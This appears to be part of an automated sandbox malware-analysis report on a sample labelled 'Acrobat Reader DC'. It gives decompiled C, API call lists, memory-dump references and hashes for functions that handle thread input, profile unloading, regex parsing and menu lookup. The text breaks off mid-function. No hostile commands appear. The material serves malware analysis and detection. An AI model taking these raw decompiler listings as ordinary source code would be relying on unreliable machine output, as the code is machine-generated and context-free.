                                  • Instruction ID: 3470c143a95c0eef1b65460b57efe1f3fa5fad32f127a08d2907f48b6a67c281
                                  • Opcode Fuzzy Hash: e088a7bf58335eb6944ed34f3b8eeab294ed842f4155ecbba55165c5b0624384
                                  • Instruction Fuzzy Hash: DFF01C72BC034476F7259B59DD47F853A689719F48F20002AB7086E1E3C6F9B850D7AD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0043646A Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 66%
                                  			E0043646A(struct HWND__* _a4, long _a8) {
				long _t4;
				long _t8;
				struct HWND__* _t9;

				_t9 = _a4;
				if(_a8 != 1) {
					_push(0);
					L4:
					_t4 = GetWindowThreadProcessId(_t9, 0);
					return AttachThreadInput(GetCurrentThreadId(), _t4, ??);
				}
				_t8 = SendMessageTimeoutW(_t9, 0, 0, 0, 2, 0x1388,  &_a8);
				if(_t8 != 0) {
					_push(1);
					goto L4;
				}
				return _t8;
			}






                                  0x00436472
                                  0x00436475
                                  0x00436497
                                  0x00436499
                                  0x0043649c
                                  0x00000000
                                  0x004364aa
                                  0x00436489
                                  0x00436491
                                  0x00436493
                                  0x00000000
                                  0x00436493
                                  0x004364b2

                                  APIs
                                  • SendMessageTimeoutW.USER32 ref: 00436489
                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                  • GetCurrentThreadId.KERNEL32 ref: 004364A3
                                  • AttachThreadInput.USER32(00000000), ref: 004364AA
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                  • String ID:
                                  • API String ID: 2710830443-0
                                  • Opcode ID: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                  • Instruction ID: 8dfc3faa83ebd232c18032ab1719f084f6ac8c8028b438e2b3a9de4cfe148046
                                  • Opcode Fuzzy Hash: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                  • Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00436C2B Relevance: 6.0, APIs: 4, Instructions: 29synchronizationCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 75%
                                  			E00436C2B(void** _a4) {
				void** _t16;

				_t16 = _a4;
				WaitForSingleObject( *_t16, 0xffffffff);
				__imp__UnloadUserProfile(_t16[2], _t16[1]);
				CloseHandle(_t16[2]);
				CloseHandle( *_t16);
				E00436BA9(_t16);
				return 0;
			}




                                  0x00436c2f
                                  0x00436c38
                                  0x00436c46
                                  0x00436c56
                                  0x00436c5b
                                  0x00436c5e
                                  0x00436c6b

                                  APIs
                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
                                  • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
                                  • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
                                  • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
                                    • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
                                    • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                  • String ID:
                                  • API String ID: 146765662-0
                                  • Opcode ID: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                  • Instruction ID: 8fc8aea04bb3fa9100768a89291620bc24087d812574934f99790ad9b639e1d9
                                  • Opcode Fuzzy Hash: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                  • Instruction Fuzzy Hash: D9E0C97A510215ABC720EBA6DC48C5BB7ACEF99330311892EFD9683750DA74F840CFA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041514D Relevance: 6.0, APIs: 4, Instructions: 16threadCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0041514D() {
				void* _t3;
				void* _t6;
				void* _t8;
				void* _t9;

				_t9 = E004179F0(_t6, _t8);
				if(_t9 != 0) {
					_t3 =  *(_t9 + 4);
					if(_t3 != 0xffffffff) {
						CloseHandle(_t3);
					}
					E00417BB2(_t9);
				}
				ExitThread(0);
			}







                                  0x00415155
                                  0x00415159
                                  0x0041515b
                                  0x00415161
                                  0x00415164
                                  0x00415164
                                  0x0041516b
                                  0x00415170
                                  0x00415173

                                  APIs
                                  • __getptd_noexit.LIBCMT ref: 00415150
                                    • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
                                    • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
                                    • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
                                    • Part of subcall function 004179F0: __initptd.LIBCMT ref: 00417A3F
                                    • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
                                    • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
                                  • CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
                                  • __freeptd.LIBCMT ref: 0041516B
                                  • ExitThread.KERNEL32 ref: 00415173
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit__initptd
                                  • String ID:
                                  • API String ID: 2246029678-0
                                  • Opcode ID: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                  • Instruction ID: f82a1693998e09e6351869d5e4a2ded823041337c12103c56f11d560ed0c89ab
                                  • Opcode Fuzzy Hash: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                  • Instruction Fuzzy Hash: BCD0A732805E10A7C122273D5C0DBDF26655F40735B140B09FC25872D1CBACDDC143AC
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0042F373 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 370COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0042F373(signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr* _a28) {
				signed char* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _t82;
				signed int _t83;
				signed char _t85;
				intOrPtr _t86;
				intOrPtr _t88;
				signed char _t89;
				void* _t93;
				signed int _t94;
				signed char _t96;
				signed char _t97;
				signed char _t98;
				void* _t99;
				signed char _t100;
				signed char _t101;
				signed int _t102;
				void* _t105;
				signed char _t107;
				signed char _t108;
				signed int _t109;
				intOrPtr* _t111;
				intOrPtr _t112;
				intOrPtr _t113;
				intOrPtr _t114;
				intOrPtr _t118;
				signed char _t121;
				signed char _t122;
				signed char _t123;
				signed char* _t124;
				signed char _t137;
				intOrPtr _t138;
				intOrPtr _t139;
				signed char* _t140;
				void* _t141;

				_t111 = _a28;
				_t140 =  *_a4;
				_t82 =  *_t111;
				_t113 = _t82;
				_v8 = _t140;
				_t138 = _a12;
				_v20 = _t113;
				_v12 = _t113;
				_v16 = 0;
				if( *_t140 != 0x28) {
					L35:
					_t139 = _a8;
					if(_t140 >=  *((intOrPtr*)(_t139 + 0x1c))) {
						goto L101;
					} else {
						while(1) {
							_t85 =  *_t140;
							_t114 = _v12;
							if(_t85 != 0x5c) {
								goto L45;
							}
							_t140 =  &(_t140[1]);
							_v8 = _t140;
							_t100 =  *_t140;
							if(_t100 == 0) {
								goto L101;
							} else {
								if(_t100 != 0x51) {
									L96:
									_t140 =  &(_t140[1]);
									_v8 = _t140;
									if(_t140 >=  *((intOrPtr*)(_t139 + 0x1c))) {
										goto L101;
									} else {
										_t111 = _a28;
										continue;
									}
								} else {
									while(1) {
										_t140 =  &(_t140[1]);
										_v8 = _t140;
										_t101 =  *_t140;
										if(_t101 == 0) {
											goto L101;
										}
										if(_t101 != 0x5c) {
											continue;
										} else {
											if(_t101 == 0) {
												goto L101;
											} else {
												_t140 =  &(_t140[1]);
												_v8 = _t140;
												if( *_t140 != 0x45) {
													continue;
												} else {
													goto L96;
												}
											}
										}
										goto L107;
									}
									goto L101;
								}
							}
							goto L107;
							L45:
							if(_t85 != 0x5b) {
								_t125 = _a20;
								if(_a20 == 0 || _t85 != 0x23) {
									if(_t85 != 0x28) {
										if(_t85 == 0x29) {
											if(_v16 != 0 &&  *_t111 < _t114) {
												 *_t111 = _t114;
											}
											goto L101;
										} else {
											if(_t85 == 0x7c && _v16 != 0) {
												_t86 =  *_t111;
												if(_t86 > _t114) {
													_v12 = _t86;
												}
												 *_t111 = _v20;
											}
											goto L96;
										}
									} else {
										_t88 = E0042F373( &_v8, _t139, _a12, _a16, _t125, _a24, _t111);
										_t141 = _t141 + 0x1c;
										if(_t88 > 0) {
											goto L106;
										} else {
											_t140 = _v8;
											if( *_t140 == 0) {
												goto L101;
											} else {
												goto L96;
											}
										}
									}
								} else {
									_t140 =  &(_t140[1]);
									_v8 = _t140;
									_t89 =  *_t140;
									if(_t89 == 0) {
										goto L101;
									} else {
										do {
											_t117 =  *((intOrPtr*)(_t139 + 0x58));
											if( *((intOrPtr*)(_t139 + 0x58)) == 0) {
												_t118 =  *((intOrPtr*)(_t139 + 0x5c));
												if(_t140 >  *((intOrPtr*)(_t139 + 0x1c)) - _t118 || _t89 !=  *((intOrPtr*)(_t139 + 0x60)) || _t118 != 1 && _t140[1] !=  *((intOrPtr*)(_t139 + 0x61))) {
													goto L81;
												} else {
													goto L75;
												}
											} else {
												_t92 =  *((intOrPtr*)(_t139 + 0x1c));
												if(_t140 >=  *((intOrPtr*)(_t139 + 0x1c))) {
													L81:
													_t140 =  &(_t140[1]);
													_v8 = _t140;
													if(_a24 != 0 && ( *_t140 & 0x000000c0) == 0x80) {
														do {
															_t140 =  &(_t140[1]);
															_v8 = _t140;
														} while (( *_t140 & 0x000000c0) == 0x80);
													}
													goto L84;
												} else {
													_t53 = _t139 + 0x5c; // 0x5c
													_t93 = E0042E9B5(_t140, _t117, _t92, _t53, _a24);
													_t141 = _t141 + 0x14;
													if(_t93 == 0) {
														goto L81;
													} else {
														L75:
														_t140 =  &(_t140[ *((intOrPtr*)(_t139 + 0x5c)) - 1]);
														_v8 = _t140;
														if( *_t140 == 0) {
															goto L101;
														} else {
															goto L96;
														}
													}
												}
											}
											goto L107;
											L84:
											_t89 =  *_t140;
										} while (_t89 != 0);
										_t94 = _a4;
										 *_t94 = _t140;
										return _t94 | 0xffffffff;
									}
								}
							} else {
								_t112 = 0;
								while(1) {
									L47:
									_t96 = _t140[1];
									if(_t96 != 0x5c) {
										break;
									}
									_t140 =  &(_t140[2]);
									if( *_t140 != 0x45) {
										_t99 = E00416931(_t114, _t140, "Q\\E", 3);
										_t140 = _v8;
										_t141 = _t141 + 0xc;
										if(_t99 == 0) {
											_t140 =  &(_t140[4]);
											_v8 = _t140;
											continue;
										}
									} else {
										_v8 = _t140;
										continue;
									}
									L55:
									if(_t140[1] == 0x5d && ( *(_t139 + 0x44) & 0x02000000) == 0) {
										_t140 =  &(_t140[1]);
									}
									_t140 =  &(_t140[1]);
									_v8 = _t140;
									_t83 =  *_t140;
									if(_t83 == 0x5d) {
										goto L96;
									} else {
										while(_t83 != 0) {
											if(_t83 != 0x5c) {
												L67:
												_t140 =  &(_t140[1]);
												_v8 = _t140;
												_t83 =  *_t140;
												if(_t83 != 0x5d) {
													continue;
												} else {
													goto L96;
												}
											} else {
												_t140 =  &(_t140[1]);
												_v8 = _t140;
												_t97 =  *_t140;
												if(_t97 == 0) {
													goto L101;
												} else {
													if(_t97 != 0x51) {
														goto L67;
													} else {
														while(1) {
															_t140 =  &(_t140[1]);
															_v8 = _t140;
															_t98 =  *_t140;
															if(_t98 == 0) {
																goto L101;
															}
															if(_t98 != 0x5c) {
																continue;
															} else {
																if(_t98 == 0) {
																	goto L101;
																} else {
																	_t140 =  &(_t140[1]);
																	_v8 = _t140;
																	if( *_t140 != 0x45) {
																		continue;
																	} else {
																		goto L67;
																	}
																}
															}
															goto L107;
														}
														goto L101;
													}
												}
											}
											goto L107;
										}
										goto L102;
									}
									goto L107;
								}
								if(_t112 == 0 && _t96 == 0x5e) {
									_t140 =  &(_t140[1]);
									_t112 = 1;
									_v8 = _t140;
									goto L47;
								}
								goto L55;
							}
							goto L107;
						}
					}
				} else {
					_t121 = _t140[1];
					if(_t121 != 0x2a) {
						if(_t121 == 0x3f) {
							_t122 = _t140[2];
							if(_t122 != 0x7c) {
								if(_t122 != 0x23) {
									_t140 =  &(_t140[2]);
									_v8 = _t140;
									if(_t122 != 0x28) {
										if( *_t140 == 0x50) {
											_t140 =  &(_t140[1]);
											_v8 = _t140;
										}
										_t123 =  *_t140;
										if(_t123 != 0x3c) {
											L23:
											if(_t123 != 0x27) {
												goto L35;
											} else {
												goto L24;
											}
										} else {
											_t137 = _t140[1];
											if(_t137 == 0x21 || _t137 == 0x3d) {
												goto L23;
											} else {
												L24:
												_t88 = _t82 + 1;
												 *_t111 = _t88;
												if(_t138 != 0 || _t88 != _a16) {
													_t102 =  *_t140 & 0x000000ff;
													_t140 =  &(_t140[1]);
													_v8 = _t140;
													if(_t102 == 0x3c) {
														_t102 = 0x3e;
													}
													_t124 = _t140;
													while(( *_t140 & 0x000000ff) != _t102) {
														_t140 =  &(_t140[1]);
														_v8 = _t140;
													}
													if(_t138 == 0 || _a16 != _t140 - _t124) {
														goto L35;
													} else {
														_t105 = E00416931(_t124, _t138, _t124, _a16);
														_t141 = _t141 + 0xc;
														if(_t105 != 0) {
															_t140 = _v8;
															goto L35;
														} else {
															return  *_t111;
														}
													}
												} else {
													goto L106;
												}
											}
										}
									} else {
										if(_t140[1] != 0x3f) {
											_t107 =  *_t140;
											if(_t107 != 0) {
												while(_t107 != 0x29) {
													_t140 =  &(_t140[1]);
													_v8 = _t140;
													_t107 =  *_t140;
													if(_t107 != 0) {
														continue;
													} else {
													}
													goto L35;
												}
												if( *_t140 != 0) {
													goto L17;
												}
											}
										}
										goto L35;
									}
								} else {
									_t140 =  &(_t140[3]);
									_v8 = _t140;
									_t108 =  *_t140;
									if(_t108 == 0) {
										L101:
										_t83 = _a4;
										 *_t83 = _t140;
										L102:
										return _t83 | 0xffffffff;
									} else {
										while(_t108 != 0x29) {
											_t140 =  &(_t140[1]);
											_v8 = _t140;
											_t108 =  *_t140;
											if(_t108 != 0) {
												continue;
											} else {
												_t109 = _a4;
												 *_t109 = _t140;
												return _t109 | 0xffffffff;
											}
											goto L107;
										}
										goto L101;
									}
								}
							} else {
								_t140 =  &(_t140[3]);
								_v8 = _t140;
								_v16 = 1;
								goto L35;
							}
						} else {
							_t88 = _t82 + 1;
							 *_t111 = _t88;
							if(_t138 != 0 || _t88 != _a16) {
								L17:
								_t140 =  &(_t140[1]);
								_v8 = _t140;
								goto L35;
							} else {
								L106:
								return _t88;
							}
						}
					} else {
						_t140 =  &(_t140[2]);
						_v8 = _t140;
						goto L35;
					}
				}
				L107:
			}








































                                  0x0042f37d
                                  0x0042f381
                                  0x0042f383
                                  0x0042f385
                                  0x0042f387
                                  0x0042f38e
                                  0x0042f391
                                  0x0042f394
                                  0x0042f397
                                  0x0042f39e
                                  0x0042f4d1
                                  0x0042f4d1
                                  0x0042f4d7
                                  0x00000000
                                  0x00000000
                                  0x0042f4dd
                                  0x0042f4dd
                                  0x0042f4df
                                  0x0042f4e4
                                  0x00000000
                                  0x00000000
                                  0x0042f4e6
                                  0x0042f4e7
                                  0x0042f4ea
                                  0x0042f4ee
                                  0x00000000
                                  0x0042f4f4
                                  0x0042f4f6
                                  0x0042f6e9
                                  0x0042f6e9
                                  0x0042f6ea
                                  0x0042f6f0
                                  0x00000000
                                  0x0042f6f2
                                  0x0042f6f2
                                  0x00000000
                                  0x0042f6f2
                                  0x0042f503
                                  0x0042f503
                                  0x0042f503
                                  0x0042f504
                                  0x0042f507
                                  0x0042f50b
                                  0x00000000
                                  0x00000000
                                  0x0042f513
                                  0x00000000
                                  0x0042f515
                                  0x0042f517
                                  0x00000000
                                  0x0042f51d
                                  0x0042f51d
                                  0x0042f51e
                                  0x0042f524
                                  0x00000000
                                  0x0042f526
                                  0x00000000
                                  0x0042f526
                                  0x0042f524
                                  0x0042f517
                                  0x00000000
                                  0x0042f513
                                  0x00000000
                                  0x0042f503
                                  0x0042f4f6
                                  0x00000000
                                  0x0042f52b
                                  0x0042f52d
                                  0x0042f5e9
                                  0x0042f5ee
                                  0x0042f6a2
                                  0x0042f6cf
                                  0x0042f6fe
                                  0x0042f704
                                  0x0042f704
                                  0x00000000
                                  0x0042f6d1
                                  0x0042f6d3
                                  0x0042f6db
                                  0x0042f6df
                                  0x0042f6e1
                                  0x0042f6e1
                                  0x0042f6e7
                                  0x0042f6e7
                                  0x00000000
                                  0x0042f6d3
                                  0x0042f6a4
                                  0x0042f6b7
                                  0x0042f6bc
                                  0x0042f6c1
                                  0x00000000
                                  0x0042f6c3
                                  0x0042f6c3
                                  0x0042f6c9
                                  0x00000000
                                  0x0042f6cb
                                  0x00000000
                                  0x0042f6cb
                                  0x0042f6c9
                                  0x0042f6c1
                                  0x0042f5fc
                                  0x0042f5fc
                                  0x0042f5fd
                                  0x0042f600
                                  0x0042f604
                                  0x00000000
                                  0x0042f60a
                                  0x0042f60a
                                  0x0042f60a
                                  0x0042f60f
                                  0x0042f647
                                  0x0042f651
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0042f611
                                  0x0042f611
                                  0x0042f616
                                  0x0042f665
                                  0x0042f665
                                  0x0042f66a
                                  0x0042f66d
                                  0x0042f679
                                  0x0042f679
                                  0x0042f67a
                                  0x0042f682
                                  0x0042f679
                                  0x00000000
                                  0x0042f618
                                  0x0042f61c
                                  0x0042f623
                                  0x0042f628
                                  0x0042f62d
                                  0x00000000
                                  0x0042f62f
                                  0x0042f62f
                                  0x0042f632
                                  0x0042f636
                                  0x0042f63c
                                  0x00000000
                                  0x0042f642
                                  0x00000000
                                  0x0042f642
                                  0x0042f63c
                                  0x0042f62d
                                  0x0042f616
                                  0x00000000
                                  0x0042f687
                                  0x0042f687
                                  0x0042f689
                                  0x0042f691
                                  0x0042f695
                                  0x0042f69f
                                  0x0042f69f
                                  0x0042f604
                                  0x0042f533
                                  0x0042f533
                                  0x0042f535
                                  0x0042f535
                                  0x0042f535
                                  0x0042f53a
                                  0x00000000
                                  0x00000000
                                  0x0042f53c
                                  0x0042f542
                                  0x0042f551
                                  0x0042f556
                                  0x0042f559
                                  0x0042f55e
                                  0x0042f560
                                  0x0042f563
                                  0x00000000
                                  0x0042f563
                                  0x0042f544
                                  0x0042f544
                                  0x00000000
                                  0x0042f544
                                  0x0042f57b
                                  0x0042f57f
                                  0x0042f58a
                                  0x0042f58a
                                  0x0042f58b
                                  0x0042f58c
                                  0x0042f58f
                                  0x0042f593
                                  0x00000000
                                  0x0042f599
                                  0x0042f599
                                  0x0042f5a3
                                  0x0042f5da
                                  0x0042f5da
                                  0x0042f5db
                                  0x0042f5de
                                  0x0042f5e2
                                  0x00000000
                                  0x0042f5e4
                                  0x00000000
                                  0x0042f5e4
                                  0x0042f5a5
                                  0x0042f5a5
                                  0x0042f5a6
                                  0x0042f5a9
                                  0x0042f5ad
                                  0x00000000
                                  0x0042f5b3
                                  0x0042f5b5
                                  0x00000000
                                  0x0042f5b7
                                  0x0042f5b7
                                  0x0042f5b7
                                  0x0042f5b8
                                  0x0042f5bb
                                  0x0042f5bf
                                  0x00000000
                                  0x00000000
                                  0x0042f5c7
                                  0x00000000
                                  0x0042f5c9
                                  0x0042f5cb
                                  0x00000000
                                  0x0042f5d1
                                  0x0042f5d1
                                  0x0042f5d2
                                  0x0042f5d8
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0042f5d8
                                  0x0042f5cb
                                  0x00000000
                                  0x0042f5c7
                                  0x00000000
                                  0x0042f5b7
                                  0x0042f5b5
                                  0x0042f5ad
                                  0x00000000
                                  0x0042f5a3
                                  0x00000000
                                  0x0042f599
                                  0x00000000
                                  0x0042f593
                                  0x0042f56a
                                  0x0042f570
                                  0x0042f571
                                  0x0042f576
                                  0x00000000
                                  0x0042f576
                                  0x00000000
                                  0x0042f56a
                                  0x00000000
                                  0x0042f52d
                                  0x0042f4dd
                                  0x0042f3a4
                                  0x0042f3a4
                                  0x0042f3aa
                                  0x0042f718
                                  0x0042f3bb
                                  0x0042f3c1
                                  0x0042f3d8
                                  0x0042f40b
                                  0x0042f40e
                                  0x0042f414
                                  0x0042f452
                                  0x0042f454
                                  0x0042f455
                                  0x0042f455
                                  0x0042f458
                                  0x0042f45d
                                  0x0042f46c
                                  0x0042f46f
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0042f45f
                                  0x0042f45f
                                  0x0042f465
                                  0x00000000
                                  0x0042f471
                                  0x0042f471
                                  0x0042f471
                                  0x0042f472
                                  0x0042f476
                                  0x0042f481
                                  0x0042f484
                                  0x0042f485
                                  0x0042f48b
                                  0x0042f48d
                                  0x0042f48d
                                  0x0042f495
                                  0x0042f499
                                  0x0042f49b
                                  0x0042f49c
                                  0x0042f4a2
                                  0x0042f4a8
                                  0x00000000
                                  0x0042f4b3
                                  0x0042f4b9
                                  0x0042f4be
                                  0x0042f4c3
                                  0x0042f4ce
                                  0x00000000
                                  0x0042f4c5
                                  0x0042f4cd
                                  0x0042f4cd
                                  0x0042f4c3
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0042f476
                                  0x0042f465
                                  0x0042f416
                                  0x0042f41a
                                  0x0042f420
                                  0x0042f424
                                  0x0042f42a
                                  0x0042f42e
                                  0x0042f42f
                                  0x0042f432
                                  0x0042f436
                                  0x00000000
                                  0x00000000
                                  0x0042f438
                                  0x00000000
                                  0x0042f436
                                  0x0042f440
                                  0x00000000
                                  0x00000000
                                  0x0042f440
                                  0x0042f424
                                  0x00000000
                                  0x0042f41a
                                  0x0042f3da
                                  0x0042f3da
                                  0x0042f3dd
                                  0x0042f3e0
                                  0x0042f3e4
                                  0x0042f706
                                  0x0042f706
                                  0x0042f709
                                  0x0042f70d
                                  0x0042f714
                                  0x0042f3ea
                                  0x0042f3ea
                                  0x0042f3f2
                                  0x0042f3f3
                                  0x0042f3f6
                                  0x0042f3fa
                                  0x00000000
                                  0x0042f3fc
                                  0x0042f3fc
                                  0x0042f400
                                  0x0042f40a
                                  0x0042f40a
                                  0x00000000
                                  0x0042f3fa
                                  0x00000000
                                  0x0042f3ea
                                  0x0042f3e4
                                  0x0042f3c3
                                  0x0042f3c3
                                  0x0042f3c6
                                  0x0042f3c9
                                  0x00000000
                                  0x0042f3c9
                                  0x0042f71e
                                  0x0042f71e
                                  0x0042f71f
                                  0x0042f723
                                  0x0042f446
                                  0x0042f446
                                  0x0042f447
                                  0x00000000
                                  0x0042f738
                                  0x0042f738
                                  0x0042f738
                                  0x0042f738
                                  0x0042f723
                                  0x0042f3b0
                                  0x0042f3b0
                                  0x0042f3b3
                                  0x00000000
                                  0x0042f3b3
                                  0x0042f3aa
                                  0x00000000

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _strncmp
                                  • String ID: Q\E
                                  • API String ID: 909875538-2189900498
                                  • Opcode ID: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                  • Instruction ID: ec78d02982e52cebfc3c5ce94050df53d12509a5c8006a296af1ac46f88178f7
                                  • Opcode Fuzzy Hash: 065ac9b34865f8fc92d580161c5db786cff1d7033ea8ce1a4bef46ec8c054806
                                  • Instruction Fuzzy Hash: 34C1A070A04279ABDF318E58A4507ABBBB5AF59310FE441BFD8D493341D2784D8ACB89
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004440E0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 79%
                                  			E004440E0(int _a4, intOrPtr* _a8, int _a12) {
				struct tagMENUITEMINFOW _v52;
				void* __edi;
				void* __esi;
				int _t28;
				signed int _t30;
				intOrPtr _t34;
				signed int _t35;
				signed int _t38;
				int _t42;
				struct HMENU__* _t52;
				signed int* _t55;

				_t28 = _a4;
				_t55 = _a12;
				_a12 = 0xffffffff;
				if(_t28 == 5 || _t28 == 6) {
					__eflags = 0;
					return 0;
				} else {
					if(_t28 == 3 || _t28 == 4) {
						_t42 = _t28;
						goto L8;
					} else {
						if(E00434179(0x4a8710, _t28,  &_a12) != 0) {
							_t42 = _a12;
							L8:
							_t30 =  *(0x4a88c4 + _t42 * 4);
							 *_t55 = 0;
							__eflags = _t30;
							if(_t30 == 0) {
								goto L5;
							} else {
								_t52 =  *_t30;
								_v52.cbSize = 0x30;
								E00412F40( &(_v52.fMask), 0, 0x2c);
								__eflags = _t52;
								if(__eflags == 0) {
									L24:
									__eflags = 0;
									return 0;
								} else {
									_push(0x208);
									_t34 = E004115D7(_t52, _t55, __eflags);
									 *_a8 = _t34;
									_v52.fMask = 0x11;
									_v52.dwTypeData = _t34;
									_v52.cch = 0x104;
									_t35 = GetMenuItemInfoW(_t52, _t42, 0,  &_v52);
									__eflags = _t35;
									if(_t35 == 0) {
										L23:
										_push( *_a8);
										E004111DC();
										goto L24;
									} else {
